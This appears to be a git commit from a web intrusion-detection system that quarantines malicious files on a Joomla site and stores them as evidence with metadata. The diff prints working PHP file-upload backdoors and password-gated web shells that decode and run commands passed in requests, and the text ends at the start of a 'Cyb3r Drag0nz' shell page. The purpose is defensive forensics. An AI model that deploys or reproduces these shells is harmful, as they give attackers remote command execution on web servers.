quarantine: family=uploader-dropper (93 fájl)
vhost: www.archlinexp.eu rel_path: 50nnp2o4xt.php.json result: quarantined evidence_sha256: ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1 timestamp: 20260718T160204Z finding_ref: 7166 vhost: www.archlinexp.eu rel_path: _h3x_672ba9cf.php.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4848 vhost: www.archlinexp.eu rel_path: administrator/cache/c_03e0fd55.php.json result: quarantined evidence_sha256: 65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d timestamp: 20260718T160204Z finding_ref: 5110 vhost: www.archlinexp.eu rel_path: administrator/cache/c_7f0b46f9.php.json result: quarantined evidence_sha256: 602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8 timestamp: 20260718T160204Z finding_ref: 5114 vhost: www.archlinexp.eu rel_path: administrator/cache/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5115 vhost: www.archlinexp.eu rel_path: administrator/components/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5117 vhost: www.archlinexp.eu rel_path: administrator/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5099 vhost: www.archlinexp.eu rel_path: administrator/index.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5100 vhost: www.archlinexp.eu rel_path: administrator/ko6h7s5e9kak.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5104 vhost: www.archlinexp.eu rel_path: administrator/language/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5116 vhost: www.archlinexp.eu rel_path: administrator/templates/hathor/index.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5106 vhost: www.archlinexp.eu rel_path: administrator/templates/isis/index.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5108 vhost: www.archlinexp.eu rel_path: administrator/yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5103 vhost: www.archlinexp.eu rel_path: bexkn.php.json result: quarantined evidence_sha256: a9422f224ffc70deb475a1ad4d399a4bfcb87a3a7051341bfd9a8326153416cb timestamp: 20260718T160204Z finding_ref: 4916 vhost: www.archlinexp.eu rel_path: c_03e0fd55.php.json result: quarantined evidence_sha256: 65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d timestamp: 20260718T160204Z finding_ref: 4838 vhost: www.archlinexp.eu rel_path: c_7f0b46f9.php.json result: quarantined evidence_sha256: 602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8 timestamp: 20260718T160204Z finding_ref: 4865 vhost: www.archlinexp.eu rel_path: cache/c_03e0fd55.php.json result: quarantined evidence_sha256: 65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d timestamp: 20260718T160204Z finding_ref: 5015 vhost: www.archlinexp.eu rel_path: cache/c_7f0b46f9.php.json result: quarantined evidence_sha256: 602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8 timestamp: 20260718T160204Z finding_ref: 5022 vhost: www.archlinexp.eu rel_path: cache/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5023 vhost: www.archlinexp.eu rel_path: cache/yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5025 vhost: www.archlinexp.eu rel_path: cbdjs.json result: quarantined evidence_sha256: 43c4c299ad5f46e41bc68ab64344acb9d0ee7b1b7344fa284a0570c92a96bd1a timestamp: 20260718T160204Z finding_ref: 4899 vhost: www.archlinexp.eu rel_path: components/com_content/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5293 vhost: www.archlinexp.eu rel_path: components/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5292 vhost: www.archlinexp.eu rel_path: cyberdjs.json result: quarantined evidence_sha256: 43c4c299ad5f46e41bc68ab64344acb9d0ee7b1b7344fa284a0570c92a96bd1a timestamp: 20260718T160204Z finding_ref: 4853 vhost: www.archlinexp.eu rel_path: f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4867 vhost: www.archlinexp.eu rel_path: f46vc3nzn1qw.php5.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4845 vhost: www.archlinexp.eu rel_path: f46vc3nzn1qw.php7.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4918 vhost: www.archlinexp.eu rel_path: f46vc3nzn1qw.phtml.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4887 vhost: www.archlinexp.eu rel_path: friska.php.json result: quarantined evidence_sha256: 80d56ff0d995aa16fc2c15e50ea9826d945ce6d52659a46f55e2692a5cac3d0d timestamp: 20260718T160204Z finding_ref: 4898 vhost: www.archlinexp.eu rel_path: images/50nnp2o4xt.php.json result: quarantined evidence_sha256: ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1 timestamp: 20260718T160204Z finding_ref: 7195 vhost: www.archlinexp.eu rel_path: images/6iyo68ipsz.php.json result: quarantined evidence_sha256: b3cedb62555690bf309116f07bc6fd9beb53f3f58fd3e5fb1102636b084e5b50 timestamp: 20260718T160204Z finding_ref: 5211 vhost: www.archlinexp.eu rel_path: images/backup.f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5165 vhost: www.archlinexp.eu rel_path: images/c_03e0fd55.php.json result: quarantined evidence_sha256: 65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d timestamp: 20260718T160204Z finding_ref: 5147 vhost: www.archlinexp.eu rel_path: images/c_7f0b46f9.php.json result: quarantined evidence_sha256: 602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8 timestamp: 20260718T160204Z finding_ref: 5164 vhost: www.archlinexp.eu rel_path: images/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5167 vhost: www.archlinexp.eu rel_path: images/ko6h7s5e9kak.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5200 vhost: www.archlinexp.eu rel_path: images/ko6h7s5e9kak.phtml.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5174 vhost: www.archlinexp.eu rel_path: images/temp.f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5180 vhost: www.archlinexp.eu rel_path: images/yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5193 vhost: www.archlinexp.eu rel_path: joth73.json result: quarantined evidence_sha256: 37153723135d788d7dfa2c8b35a804a39a41c6ad26c4cc263c7e939dc54f1169 timestamp: 20260718T160204Z finding_ref: 4901 vhost: www.archlinexp.eu rel_path: ko6h7s5e9kak.phar.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4879 vhost: www.archlinexp.eu rel_path: ko6h7s5e9kak.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4925 vhost: www.archlinexp.eu rel_path: ko6h7s5e9kak.php5.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4905 vhost: www.archlinexp.eu rel_path: ko6h7s5e9kak.php7.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4849 vhost: www.archlinexp.eu rel_path: ko6h7s5e9kak.phtml.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4877 vhost: www.archlinexp.eu rel_path: language/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5214 vhost: www.archlinexp.eu rel_path: logs/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5305 vhost: www.archlinexp.eu rel_path: logs/yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5307 vhost: www.archlinexp.eu rel_path: media/50nnp2o4xt.php.json result: quarantined evidence_sha256: ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1 timestamp: 20260718T160204Z finding_ref: 7191 vhost: www.archlinexp.eu rel_path: media/c_03e0fd55.php.json result: quarantined evidence_sha256: 65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d timestamp: 20260718T160204Z finding_ref: 4984 vhost: www.archlinexp.eu rel_path: media/c_7f0b46f9.php.json result: quarantined evidence_sha256: 602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8 timestamp: 20260718T160204Z finding_ref: 4991 vhost: www.archlinexp.eu rel_path: media/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4992 vhost: www.archlinexp.eu rel_path: media/ko6h7s5e9kak.phtml.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4994 vhost: www.archlinexp.eu rel_path: media/yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4997 vhost: www.archlinexp.eu rel_path: modules/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5283 vhost: www.archlinexp.eu rel_path: modules/mod_custom/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5284 vhost: www.archlinexp.eu rel_path: templates/50nnp2o4xt.php.json result: quarantined evidence_sha256: ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1 timestamp: 20260718T160204Z finding_ref: 7182 vhost: www.archlinexp.eu rel_path: templates/_h3x_672ba9cf.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4949 vhost: www.archlinexp.eu rel_path: templates/_h3x_672ba9cf.php.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4948 vhost: www.archlinexp.eu rel_path: templates/beez3/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4981 vhost: www.archlinexp.eu rel_path: templates/beez3/index.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4982 vhost: www.archlinexp.eu rel_path: templates/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4952 vhost: www.archlinexp.eu rel_path: templates/protostar/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4974 vhost: www.archlinexp.eu rel_path: templates/protostar/index.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4975 vhost: www.archlinexp.eu rel_path: templates/shaper_helix3/layout/uploader_8kykulyz.php.json.json result: quarantined evidence_sha256: 23f19d3197130f4dd0420a9c51bcb774da4e341c25a7e7033733ba3eb7a4f5b0 timestamp: 20260718T160204Z finding_ref: 4978 vhost: www.archlinexp.eu rel_path: templates/shaper_helix3/layout/uploader_g1jujsa9.php.json.json result: quarantined evidence_sha256: 70eb6bc75669692e1867abe510b7087827fc771ce798ef11aee8d1c0a672c08f timestamp: 20260718T160204Z finding_ref: 4980 vhost: www.archlinexp.eu rel_path: templates/shaper_helix3/layout/uploader_q1z4oez8.php.json.json result: quarantined evidence_sha256: 4c152a15582dde517989ca452df133a2308eeb4410eba39d7bf8d9f278db0a0b timestamp: 20260718T160204Z finding_ref: 4977 vhost: www.archlinexp.eu rel_path: templates/shaper_helix3/layout/uploader_uwqytc5i.php.json.json result: quarantined evidence_sha256: f0cdeea8d9cf8d5eaea2db8c3d42a9a1a475bacadee1bbf47bb5c1cf91233991 timestamp: 20260718T160204Z finding_ref: 4979 vhost: www.archlinexp.eu rel_path: templates/shaper_helixultimate/50nnp2o4xt.php.json result: quarantined evidence_sha256: ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1 timestamp: 20260718T160204Z finding_ref: 7188 vhost: www.archlinexp.eu rel_path: templates/shaper_helixultimate/_h3x_672ba9cf.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4966 vhost: www.archlinexp.eu rel_path: templates/shaper_helixultimate/_h3x_672ba9cf.phar.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4964 vhost: www.archlinexp.eu rel_path: templates/shaper_helixultimate/_h3x_672ba9cf.php.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4965 vhost: www.archlinexp.eu rel_path: templates/shaper_helixultimate/_h3x_672ba9cf.php5.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4961 vhost: www.archlinexp.eu rel_path: templates/shaper_helixultimate/_h3x_672ba9cf.phtml.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4972 vhost: www.archlinexp.eu rel_path: tmp/c_03e0fd55.php.json result: quarantined evidence_sha256: 65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d timestamp: 20260718T160204Z finding_ref: 5216 vhost: www.archlinexp.eu rel_path: tmp/c_7f0b46f9.php.json result: quarantined evidence_sha256: 602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8 timestamp: 20260718T160204Z finding_ref: 5223 vhost: www.archlinexp.eu rel_path: tmp/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5224 vhost: www.archlinexp.eu rel_path: tmp/wirrd.php.json result: quarantined evidence_sha256: a9422f224ffc70deb475a1ad4d399a4bfcb87a3a7051341bfd9a8326153416cb timestamp: 20260718T160204Z finding_ref: 5226 vhost: www.archlinexp.eu rel_path: tmp/yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5227 vhost: www.archlinexp.eu rel_path: uploader.json result: quarantined evidence_sha256: c5010f46b3a71c000b5499d6619b3f42605eeafab2c571a50cf0eef31cb67ff7 timestamp: 20260718T160204Z finding_ref: 4941 vhost: www.archlinexp.eu rel_path: vile.php.json result: quarantined evidence_sha256: 3e8674589c9a7ef3023d4ee162625c603a123d1aa79b09dc9f9b3f0a4e9c279e timestamp: 20260718T160204Z finding_ref: 4937 vhost: www.archlinexp.eu rel_path: wp-blog.php.json result: quarantined evidence_sha256: 11777d2b150bc992e7445519b47ab6eb4bcc9fb490a3a771b6a0709bd805f565 timestamp: 20260718T160204Z finding_ref: 4888 vhost: www.archlinexp.eu rel_path: wp-blog.php.json.json result: quarantined evidence_sha256: 11777d2b150bc992e7445519b47ab6eb4bcc9fb490a3a771b6a0709bd805f565 timestamp: 20260718T160204Z finding_ref: 4874 vhost: www.archlinexp.eu rel_path: yetixx.json result: quarantined evidence_sha256: 4dd9dec92b40075e710ac0864e0a099d9914df74d50ad1c740d7d3228a601426 timestamp: 20260718T160204Z finding_ref: 4839 vhost: www.archlinexp.eu rel_path: yhajxaav.php%00.jpg.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4929 vhost: www.archlinexp.eu rel_path: yhajxaav.php%00.txt.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4872 vhost: www.archlinexp.eu rel_path: yhajxaav.php.bak.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4940 vhost: www.archlinexp.eu rel_path: yhajxaav.php.jpg.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4834 vhost: www.archlinexp.eu rel_path: yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4911 vhost: www.archlinexp.eu rel_path: yhajxaav.php.txt.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4932 vhost: www.archlinexp.eu rel_path: yhajxaav.php4.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4875 vhost: www.archlinexp.eu rel_path: yhajxaav.php5.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4850 vhost: www.archlinexp.eu rel_path: yhajxaav.phtml.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4944
This commit is contained in:
parent
d008c6b1cf
commit
9ccb96f418
6
var/www/hosting/archlinexp.eu/www/50nnp2o4xt.php.json
Normal file
6
var/www/hosting/archlinexp.eu/www/50nnp2o4xt.php.json
Normal file
@ -0,0 +1,6 @@
|
||||
<html><body><form method=post enctype=multipart/form-data>
|
||||
<input type=file name=f><input type=submit value=Upload></form><pre><?php
|
||||
if(isset($_FILES['f'])){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);
|
||||
echo$_FILES['f']['name'].' OK';}
|
||||
echo 'UPLOAD_OKE';
|
||||
?></pre></body></html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "7166",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:50nnp2o4xt.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/50nnp2o4xt.php.json)",
|
||||
"original_sha256": "ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1784278950,
|
||||
"size": 298,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "50nnp2o4xt.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
32
var/www/hosting/archlinexp.eu/www/_h3x_672ba9cf.php.json
Normal file
32
var/www/hosting/archlinexp.eu/www/_h3x_672ba9cf.php.json
Normal file
@ -0,0 +1,32 @@
|
||||
<?php
|
||||
if(isset($_FILES['file'])){
|
||||
$target = basename($_FILES['file']['name']);
|
||||
if(move_uploaded_file($_FILES['file']['tmp_name'], $target)){
|
||||
echo "🌍 Uploaded: <a href='$target'>$target</a>";
|
||||
} else {
|
||||
echo "❈ Upload failed!";
|
||||
}
|
||||
exit;
|
||||
}
|
||||
?>
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head><title>Upload</title></head>
|
||||
<body style="background:#0a0a0a;color:#00ff00;font-family:monospace;
|
||||
display:flex;justify-content:center;align-items:center;
|
||||
height:100vh;margin:0;">
|
||||
<form method="POST" enctype="multipart/form-data"
|
||||
style="background:#111;padding:40px;border:2px solid #00ff00;
|
||||
border-radius:10px;text-align:center;">
|
||||
<h2>📤 UPLOAD</h2>
|
||||
<input type="file" name="file" required
|
||||
style="background:#0a0a0a;color:#00ff00;border:1px solid #00ff00;
|
||||
padding:10px;border-radius:5px;">
|
||||
<br><br>
|
||||
<button type="submit"
|
||||
style="background:#00ff00;color:#0a0a0a;padding:10px 30px;
|
||||
border:none;border-radius:5px;font-weight:bold;
|
||||
cursor:pointer;">↡ Upload</button>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4848",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:_h3x_672ba9cf.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/_h3x_672ba9cf.php.json)",
|
||||
"original_sha256": "472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783863598,
|
||||
"size": 1102,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "_h3x_672ba9cf.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
10
var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json
vendored
Normal file
10
var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json
vendored
Normal file
@ -0,0 +1,10 @@
|
||||
<?php
|
||||
error_reporting(0);$t='f0c1cfa275d47875';$o=false;
|
||||
if(isset($_GET['t'])&&$_GET['t']===$t)$o=true;
|
||||
if(isset($_POST['t'])&&$_POST['t']===$t)$o=true;
|
||||
if(!$o){http_response_code(404);die();}
|
||||
if(isset($_GET['c'])){{$c=base64_decode(str_replace([' ','-','_'],['+','+','/'],$_GET['c']));echo'C|';if(function_exists('system'))system($c.' 2>&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}}
|
||||
if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}}
|
||||
if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}}
|
||||
echo'S|'.php_uname();
|
||||
?>
|
||||
15
var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json.evidence.json
vendored
Normal file
15
var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json.evidence.json
vendored
Normal file
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5110",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:administrator/cache/c_03e0fd55.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json)",
|
||||
"original_sha256": "65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783194685,
|
||||
"size": 762,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "administrator/cache/c_03e0fd55.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
10
var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json
vendored
Normal file
10
var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json
vendored
Normal file
@ -0,0 +1,10 @@
|
||||
<?php
|
||||
error_reporting(0);$t='e45f50da3800d36c';$o=false;
|
||||
if(isset($_GET['t'])&&$_GET['t']===$t)$o=true;
|
||||
if(isset($_POST['t'])&&$_POST['t']===$t)$o=true;
|
||||
if(!$o){http_response_code(404);die();}
|
||||
if(isset($_GET['c'])){{$c=base64_decode(str_replace([' ','-','_'],['+','+','/'],$_GET['c']));echo'C|';if(function_exists('system'))system($c.' 2>&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}}
|
||||
if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}}
|
||||
if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}}
|
||||
echo'S|'.php_uname();
|
||||
?>
|
||||
15
var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json.evidence.json
vendored
Normal file
15
var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json.evidence.json
vendored
Normal file
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5114",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:administrator/cache/c_7f0b46f9.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json)",
|
||||
"original_sha256": "602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783201892,
|
||||
"size": 762,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "administrator/cache/c_7f0b46f9.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json
vendored
Normal file
320
var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json
vendored
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
